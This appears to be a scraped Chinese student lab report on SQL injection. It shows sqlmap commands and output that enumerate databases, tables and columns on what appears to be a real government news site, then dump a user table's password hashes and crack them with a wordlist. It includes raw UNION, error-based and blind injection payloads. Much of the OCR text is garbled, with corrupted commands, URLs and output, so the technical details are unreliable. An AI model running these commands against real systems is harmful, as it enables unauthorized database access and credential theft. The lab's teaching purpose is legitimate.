网络安全试验报告-SQL注入攻击_第1页
网络安全试验报告-SQL注入攻击_第2页
网络安全试验报告-SQL注入攻击_第3页
网络安全试验报告-SQL注入攻击_第4页
网络安全试验报告-SQL注入攻击_第5页
已阅读5页,还剩3页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、实验项目名称SQL注入攻击由上图可知后台数据库的版本是 MySQL 5.0, We眩用平台为PHP 4.4.9/Apache 1.3.283.通过Sqlmap获取数据库名。课程名称网络信息安全综合实验一、实验要求在虚拟机环境查找 SQL注入漏洞,通过Metasploit平台的sqlmap攻击实施SQL注入, 了解防御措施二、实验环境攻击机:BT5r3, IP 地址:URL http:/004_zhnews/search/detail.php?id=10832、实验步骤1.打开终端,进入 Sqlmap 目录:cd /pentest/database/sqlmap2.通过Sqlmap进行注入攻击。

2、上图可知:sqlmap探测出URL中的id参数存在着SQL注入点,并包含了基于错误的SQL注入点以及UNION查询注入点。1 :/pentest/database/sqlniap# python sqUap.py -u http:/search, cn/064_zhnew5/search/detail.php?id=lfi8321_ 一Payload: id=10832 AND 2449=2449759426a656b6d5148l0 x3a5576&734)r NLfLresuming hack-end DBMS nysql-testing connection to the target

3、urlthe following injection points with a total of S HTTP(s) requests:Type: error-basedTitle: MySQL 5.0 AMD error-based - WHERE or HAVING clause02:10:69 INFO 02:16:09 INFO sqlmap identifiedType: UNION queryTitle: MySQL UHIOM query (NULL) - 11 columnsPayad: id=10832UMI。M ALL SELECT NULLm UUU- WCAT(ex5

4、a&a73 763a,ex4a5llmLL, MLLfLLVw3uKffilKlJLLf LPlace: GETParaniieter; idType: boolean-based blindTitle: AND boolean-based blind - WHERE ar HAVING clausePayload: id=16832 AND (SELECT 4366 FR0M(SELECT COUNT(*)rC0NCAT(0 x3a&a73763a,(SELEC T (CASE WHEN (4366=4366) THEN 1 ELSE 6 END j t F Qx3a657E)673a( F

5、L00R(RAND(6) * 2 J)X FROM INFO RHATION SC HEMA. CHARACTER SETS GROUP BY x)a)01:26:14 INFO the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 4.4.9. Apache 1.3.28back-end DBMS: MySQL 5.QQl;26:14 INFO fetched data logged to text files under 1/pentest/database

6、/sq map/output/search.5,cei,1* shutting down at 61:20:14rootbt;/pentest/database/sqLmap# python sqLmmp.py -u http:/search.j . cn/ee4_zhnews/iea rch/detail.php?id=19832 -dbs t Bsqlmap/1.0- dev - 25eca9d - autontatic SQL injection and database takeover tool HYPERLINK http:/rsqlmap http:/rsqlmap. org61

7、:21:351queryretrievedprojdatabases01:21:3701:21:3761;21;3701:21:3601:21:36ei;21;36j01:21:3661:21:36j61:21:361:21:3661;21;3601:21:36IMFO INFO IMFO 1XMF0 IMFQ IMF。 IMFO IUF0 INFO IMF。 IMFO INFO INFO INFO IMFO IMFQ IMFO IMFO INFO INFOretrieved; retrieved:01:21:37availableretrieved: retrieved: retrieved

8、: retrieved;retrieved; retrieved: retrieved:retrieved:fetching database nameseproject111 gongchang hd56infoH jjnews jscreditH j sfamous jsnarth j wincrT j 2hwhHEtUES 18 EFlUieSinformation schenia Changjiang portion11 ldaiVynewsMKeb server operating system: Windowsweb application technology: PHP 1.4.

9、9. Apache 1,3.28 back-end DBHS:附SQL 5.Qdd:Ldbl七 ddLdhdE5 IB: - Changjiangr) ccrpoMtionp chilymq pj efalr p epro.ect *| gonguhmnq , I htiBGinto irttoHMtion schema Ll jjnews*J jst red3tpj 泗M5 jsnarthI41j ” jsihwti lTj 呼Ml * produce H (jr pjcjct j4.通过Sqlmap获取表名。本实验以efair数据库为例::/pentest/databB5e/sqT.ina

10、p# python sqlmap .py -u http;5巳日匚h. j写. cn/0G4_zhnews/seBrch/detail.php?id=16832, -D efair m-tables(61:33:23logged toentest/databae/sqlnap/QUtput/sesrch. j sINFO INFO INFO INFO INFO INFOretrieved: retrieved: retrieved: retrieved:01:33:24 01;33;Z4 31:33:24 01:33:24 Database: 4 tables)authuser- dbsequ

11、enceactive sess authuser db sequenceshutting down at 01:33:2401:33:23 info the back-end DBMS /eb server operating system: windows Hb application technology: PHP 4,4.back-end DBMSr MySOL 5.0fetching tables for database: the SQL query used return5 45.通过Sqlmap获取列名。以efair数据库里的auth_user为例:课看到有password一歹!

12、J:raMtMt/tetatasB/sqlnAp# python sqlmap.py -u 1 http:/search. .cn/&64_zhnewsfsearch/detail.php?id=10832 -D efair -tables -T authuser -columns01:39:3601:39:3601:39:3701:39:3701:39:3701:39:37IMFG IMFO IMFO ilMFO INFO INFOfetching columns for table 1 auth tser1 in database refair1 the SQL query used re

13、turns 4 entriesretrieved:retrieved;retrieved:retrieved;user idri(Hvarchar(32)riusername, varchar(3211password,varchar(32)Rperms*1, varchar(255) Database: efairTable; auth user4 columns十一-Columnpa5s泗rd pens+ - I Type +varchar(32) varchar(255)user id | 7archar(32) | username | varchar(32) * *+*-*4*44*

14、彳91:39:37 IMFOJ fEtched 旭限 l哪期 to t已两 map/cutput/search.js,cei.goV.cn1 Ishutting tfcwn at 01:39:37files urderro6.通过Sqlmap导出password列的内容。otbt:/pentest/database/Eqlmap# python sqlmap.py -u 由t1:p:/SEmrrti.k.CE.Cn,GJ04zhnews/search/detail.php?id=19832 -D ef air -tables 丁 auth user -columns - -dump| Type

15、password | varchar(32)| perms| varcfidr(255) | user id | vdrc;tiar32)username | varchar(32)91t42:47 (INFO; 91:42:47 INFO: 81:42:47 J INFO 61:42:47 (INFO 61:42:47 INFO 91:42:47 IINFO (41:42:47j (INFO 41:42:47 INFO 01:42:47 (INFOfetching eolutnns for table auth userT in database e-fair1the SQL query u

16、sed returns 4 entries/resumed;*varchar(32)ftresumed: *usernauie4 *varchar(32)resumed: passwordZvarchart32)resumed: Penns7, varcharf 255)fetching entries for table auth user In database efair1ttie SQL query used returns 3 entriesretrieved: Meil0e9tuU!;er,editorlatimin,rclbf 141ablb7cdG69356f5,.Bl;42:

17、47 INFO retrieved: uceieditor*usfrteditor,flcl4cbf14lablb7cd6935M555b. 61:42:47 INFO retrieved; 如E电二.usT,|43fa6Gb2b501753f3ed_8.quest 61:4247 IHFO analyzing table duap for possible password hashes V recogniiedpasswotd hashes in olunn user 中,.Dq:yofr; want to crack fhem via61:4459 INFO uting hash met

18、hod ,md5_generic_passwd, what dictionary do you want to u&e?1 default dictionary file /p2qtet/datmbaw/sqInimp,t)ct/wodliGt.txt (pres& Enter) 2 custom dictionary file3 file with list of dictionary files61:45:11) INFO using dE,uLt dictionary_ -61:45:11 INFO loading dictionary from /pentet/database/sql

19、nap/txUwordlist. txt do you want to use common password suffixes? (slow!) y/N y01:45:13INFOstarting dictianary-ba&ed cracking (nd5_generic_passwd)61:45:45INFOusing sutfix 1*61:46:19INFOusing suffix 123*61:46:52INFOusing suffix 201:47:27INFOLining suffix 1261:48:91INFOusing suffx 3T01:46:34INFOusing

20、suffix 1301:49:37INFOusing suffix 7*n161:49:49INFOusing suifix Li,61:50:291INFOusing suffix ,5,1 V01:51:15IflFO也工gjs负图,屹1 L . U)61:51:53WO Jtiirg suffix 21* J61:52:41INFOcurrent status; zal32,. |由图可知,获取 这个web应用后台数据库的所有作者用户账户和口令哈希,并保存为一个本 地的txt文件。该文件如下图:wordlist,txt (/pentest/database/sqlmapftxt) ged

21、itfile 上dit yiew Search Tools Qocumerbts Help2 jOpen t jSavewordlisttxt Xui /.uia / wa i i xu I azdabn82dd叩dempg5x87 82dawidbuz2i 82dl79895 82danald 82G0426 aZeZuGKL65 82efa80d 82enterme99 82&rnstivar S2eyte2932 82 d ufliii 8Zffa?B azfiat82f irernen70 82fishlface 82flaw84 82freekings 82g日Zbawug SZgewenketM auth usencsv (/pentest/database/sqlmap/DiitpLJt/searchJStCeigDvcrFile Edit View Search Tools Documents HelpQ Open野之会四|国|帆Un承盆陶蜀I R auth user.csv M_ 一Ijuserid rpenn7username

人人文库> 全部分类> 行业资料 > 信息产业

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

最新文档

评论

0/150

提交评论